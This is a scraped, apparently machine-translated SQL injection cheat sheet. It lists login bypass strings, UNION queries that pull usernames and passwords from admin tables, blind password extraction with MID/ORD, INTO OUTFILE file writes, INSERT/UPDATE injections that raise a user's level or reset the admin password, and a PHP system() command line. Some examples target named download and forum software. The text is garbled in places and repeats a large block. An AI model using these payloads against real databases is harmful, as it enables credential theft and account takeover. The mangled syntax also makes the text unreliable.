xiaoxiao2021-03-06  71

'OR 1 = 1

'or' 1 = 1

'/ *

'%twenty three

'and password =' ​​mypass

ID = -1 Union SELECT 1,1,1

ID = -1 Union Select Char (97), Char (97), CHAR (97)

ID = 1 Union SELECT 1,1,1 from membrate

ID = 1 Union SELECT 1,1,1 from admin

ID = 1 Union SELECT 1,1,1 from user

Userid = 1 and password = mypass

Userid = 1 and MID (Password, 3, 1) = char (112)

Userid = 1 and MID (Password, 4, 1) = char (97)

AND ORD (MID (Password, 3, 1))> 111 (the ORD function is very easy to use, you can return shaping)

'and length (password) =' 6 (detection password length)

'OR 1 = 1

'or' 1 = 1

'/ *

'%twenty three

'and password =' ​​mypass

ID = -1 Union SELECT 1,1,1

ID = -1 Union Select Char (97), Char (97), CHAR (97)

ID = 1 Union SELECT 1,1,1 from membrate

ID = 1 Union SELECT 1,1,1 from admin

ID = 1 Union SELECT 1,1,1 from user

Userid = 1 and password = mypass

Userid = 1 and MID (Password, 3, 1) = char (112)

Userid = 1 and MID (Password, 4, 1) = char (97)

AND ORD (MID (Password, 3, 1))> 111 (the ORD function is very easy to use, you can return shaping)

'and length (password) =' 6 (detection password length)

'and left (Password, 1) =' m

'and left (password, 2) =' my

…………………………And so on

'Union Select 1, UserName, Password from user / *

'Union Select 1, UserName, Password from user / *

= 'Union Select 1, username, password from user / * (can be 1 or = directly followed)

99999 Union SELECT 1, Username, Password from user / *

'Into Outfile' C: /File.txt (Export File)

= 'or 1 = 1 INTO OUTFILE' C: /FILE.TXT

1 'Union Select 1, UserName, Password from User Into Outfile' C: /user.txt

Select Password from admins where login = 'john' inTo dumpfile '/path/to/site/file.txt'id=' Union Select 1, Username, Password from User Into Outfile

ID = -1 Union Select 1, Database (), Version () (flexible application query)

Common query test statement,

SELECT * from Table Where 1 = 1

Select * from table where 'uuu' = 'uuu'

Select * from Table Where 1 <> 2

Select * from Table Where 3> 2

Select * from table where 2 <3

Select * from Table Where 1

SELECT * home where WHERE 1 1

Select * from table where 1--1

Select * from table where isnull (NULL)

Select * from Table Where Isnull (Cot (0))

Select * from table where 1 is not null

Select * from Table Where Null Is NULL

Select * from Table Where 2 Between 1 and 3

Select * from table where 'b' Between 'A' and 'c'

Select * from Table where 2 in (0, 1, 2)

Select * from Table Where Case When 1> 0 THEN 1 END

For example: Night Cat Download System 1.0 Version

ID = 1 Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1

Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_user

Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_User WHERE ID = 1

ID = 10000 Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from YMDOWN_USER WHERE ID = 1 And GroupID = 1

Union SELECT 1, Username, 1, Password, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_User WHERE ID = 1 (replace, looking for password )

Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_User WHERE ID = 1 AND ORD (MID Password, 1, 1)) = 49 (verify the first password)

Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_User WHERE ID = 1 AND ORD (MID Password, 2, 1)) = 50 (second)

Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_User WHERE ID = 1 AND ORD (MID Password, 3, 1)) = 51 ........................................................

For example 2: Gray Track Transform ID Test (Meteor)

Union% 20 (select% 20allowsmilies, public, userid, '0000-0-0 ", user (), version ()% 20FROM% 20calendar_events% 20where% 20eventid% 20 =% 2013)% 20EVENTDATE

Union% 20 (select% 20 allowsmilies, public, userid, '0000-0-0 ", pass (), version ()% 20FROM% 20Calendar_events% 20where% 20Eventid% 20 =% 2010)% 20EVENTDATE

Construct statement:

Select Allowsmilies, Public, Userid, Eventdate, Event, Subject from Calendar_Events Where EventId = 1 Union (SELECT 1, 1, 1, 1, 1, 1 from user where userid = 1)

Select Allowsmilies, Public, Userid, Eventdate, Event, Subject from Calendar_Events Where EventId = 1 Union (SELECT 1, 1, 1, 1, UserName, Password from user where userid = 1)

Union% 20 (select% 201, 0, 2, '1999-01-01', 'a', password% 20FROM% 20User% 20where% 20Userid% 20 =% 205)% 20RDER% 20BY% 20EventDate

Union% 20 (SELECT% 201, 0, 12695, '1999-01-01', 'A', Password% 20FROM% 20User% 20where% 20Userid = 13465)% 20ORDER% 20BY% 20eventDate

Union% 20 (select% 201, 0, 12695, '1999-01-01', 'a', userid% 20FROM% 20User% 20where% 20Username = 'Sandflee')% 20RDER% 20BY% 20EventDate (ID)

(Select a from table_name where a = 10 and b = 1 ORDER BY a LIMIT 10)

SELECT * from ARTICLE WHERE ARTICLEID = '$ ID' Union Select * from ... (in the same case of fields and databases, you can directly submit)

Select * from article where articleid = '$ ID' Union SELECT 1, 1, 1, 1, 1, 1, 1 from ... (in different cases)

Special skills: Write in the form, search engine and other places:




% 'Order by ArticleID / *

% 'Order by ArticleID #

__ 'Order by Article / * __' Order by ArticleID #

$ comMman = "DIR C:"; System ($ Command);

Select * from article where articleid = '$ ID'

Select * from article where articleid = $ ID

1 'and 1 = 2 Union Select * from user where userid = 1 / * sentences to

(Select * from article where articleid = '1' and 1 = 2 union select * from user where userid = 1 / * ')

1 and 1 = 2 Union Select * from user where userid = 1

Statement form: establish a library, insert:

Create Database` Injection`

Create Table `User` (

`Userid` int (11) Not null auto_increment,

`Username` VARCHAR (20) Not null default ',

`Password` VARCHAR (20) Not null default ',

Primary key (`Userid`)


INSERT INTO `USER` VALUES (1, 'swap', 'mypass");

Insert, like a registered user:

INSERT INTO `USER` (UserID, Username, Password, HomePage, Userlevel) Values ​​('', '$ usrname",' $ password ',' $ homepage ',' 1 ');

"INSERT INTO MEMBRES (Login, Password, Nom, Email, Userlevel) Values ​​('$ login', '$ Pass', '$ NOM', '$ Email', '1')

INSERT INTO MEMBRES (Login, Password, NOM, Email, Userlevel) Values ​​('', ',' ',' ',' 3 ') #', '1')

"INSERT INTO MEMBRES SET login = '$ login', password = '$ pass', NOM = '$ NOM', Email = '$ Email'

INSERT INTO MEMBRES set login = ', password =', NOM = ', userlevel =' 3 ', email =' '

"INSERT INTO MEMBRES VALUES ('$ ID', '$ login', '$ Pass', '$ NOM', '$ Email', '1')

Update user set password = '$ password', homepage = '$ homepage' where id = '$ ID' = 'md5 (mypass)' where username = 'admin' #) ', homepage =' $ homepage ' WHERE ID = '$ ID'

"Update MEMBRES SET Password = '$ Pass', NOM = '$ NOM', Email = '$ Email' Where ID = '$ Id'";

Update membres set password = '[pass]', NOM = ', userlevel =' 3 ', email =' 'where id =' [id] '

"Update news set votes = votes 1, score = score $ note where idnews = '$ ID'"

Long usage function:

Database ()

User ()


Session_user ()

Current_user ()

such as:

Update Article Set Title = $ TITLE WHERE ARTICLEID = 1 Correspondence

Update Article Set Title = Database () Where id = 1

# Update the current database name to the Title field

Update article set title = user () where id = 1

# Update the current MySQL username to the title field

Update article set title = system_user () where id = 1

# Update the current MySQL username to the title field

Update article set title = session_user () where id = 1

# Update the current MySQL username to the title field

Update Article Set Title = current_user () Where id = 1

# Update the current session authenticated username to the title field

::::: :::::::::::::::::::::: ::::::::::::::::::::::::::::::::::::::::::: ""

Select * from membrate where name like '%%' Order by uid #% 'Order by Name

Select * from membrate where name like '%%' Order by uid #% 'Order by Name

SELECT Uid from admins where login = '' or 'a' = 'a' and password = '' or 'a' = 'a' (classic)

SELECT Uid from admin s where login = '' or admin_level = 1 # 'and password =' ​​'

Select * from table where msg like '% hop'

SELECT Uid from membrate where login = 'bob' and password limited 'a%' # 'and password =' ​​'

Select * from membrate where name like '%%' Order by uid #% 'Order by Name


New Post(0)